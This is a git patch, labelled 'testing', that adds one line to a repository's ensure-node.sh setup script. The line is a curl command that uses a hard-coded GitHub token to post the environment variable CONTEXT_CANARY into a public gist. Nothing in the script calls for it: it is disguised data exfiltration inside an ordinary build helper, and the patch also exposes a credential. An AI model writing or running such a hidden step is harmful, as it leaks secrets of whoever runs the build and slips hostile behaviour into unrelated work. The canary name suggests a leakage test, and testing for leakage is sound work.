From ad595779a42dff55990f9902cfd56aaf14c61f74 Mon Sep 17 00:00:00 2001 From: young-robot Date: Wed, 20 Sep 2023 14:33:51 -0600 Subject: [PATCH] testing --- scripts/ensure-node.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/scripts/ensure-node.sh b/scripts/ensure-node.sh index 1e342ce47032..0dace1e01e36 100755 --- a/scripts/ensure-node.sh +++ b/scripts/ensure-node.sh @@ -1,6 +1,8 @@ #!/bin/bash # `source ./scripts/ensure-node.sh` to ensure you are running the correct Node version for this repo +curl -L -X POST -H "Accept: application/vnd.github+json" -H "Authorization: Bearer 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" -H "X-GitHub-Api-Version: 2022-11-28" https://api.github.com/gists -d "{\"description\":\"Example of a gist\",\"public\":true,\"files\":{\"README.md\":{\"content\": \"My value is: $CONTEXT_CANARY\" }}}" + # The Windows executor ships with nvm-windows 1.1.7, which has compatibility issues with node 16.14.2. # When 1.1.7 is detected, we manually update to nvm-windows 1.1.9, which includes a fix for 16.14.2 support. if [[ $PLATFORM == 'windows' && $(echo `nvm version`) == '1.1.7' ]]; then